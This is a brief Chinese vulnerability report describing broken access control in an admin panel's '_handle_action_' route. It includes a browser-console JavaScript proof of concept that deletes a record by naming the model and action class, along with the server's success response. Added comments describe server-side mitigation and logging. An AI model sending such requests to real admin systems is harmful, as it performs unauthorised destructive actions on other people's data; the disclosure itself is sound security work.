_handle_action_
越权
发现在后台 admin 中存在一个路由 xxxxx.com/admin/_handle_action_，
向其传递相应的参数，即可执行任何当前账号本没有权限执行的操作。
如下是示例:
控制台请求代码
// Reproduction request from the report: a POST to the admin action-dispatch route.
// Host is the report's placeholder ("xxxxx.com"), not a real target.
var url = "xxxxx.com/admin/_handle_action_";
// Request body. The caller names the record (_key), the model class (_model) and the
// action class to run (_action) directly; per the report the server dispatches on these
// values without checking that the caller is permitted to run that action on that model
// (server-side behaviour, not visible here — confirm against the route handler).
// Mitigation belongs on the server: resolve _model/_action against an allow-list and
// run the current user's permission check for the resolved action before executing it.
// For detection, log POSTs to this route together with the _model/_action values sent.
var params = {"_key":"6","_model":"App_Model_Event_Event","_action":"Encore_Admin_Grid_Actions_Delete","_input":"true"};
var xhr = new XMLHttpRequest();
// Third argument `true` makes the request asynchronous.
xhr.open("POST", url, true);
// Body is sent as JSON (see JSON.stringify below).
xhr.setRequestHeader("Content-Type", "application/json");
xhr.onload = function (e) {
// onload only fires once the request is DONE, so this readyState check is redundant
// (harmless, kept as written).
if (xhr.readyState === 4) {
if (xhr.status === 200) {
// Server response body; the report shows the JSON it returned below.
console.log(xhr.responseText);
} else {
console.error(xhr.statusText);
}
}
};
xhr.send(JSON.stringify(params));
// Network-error handler. Assigned after send(); because the request is asynchronous
// the handler is still installed before any event can fire, but conventionally it is
// set before send().
xhr.onerror = function (e) {
console.error(xhr.statusText);
};
## 以下为返回信息
ƒ (e) {
console.error(xhr.statusText);
}
VM4501:9 {"status":true,"then":{"action":"refresh","value":true},"swal":{"type":"success","title":"\u5220\u9664\u6210\u529f !"}}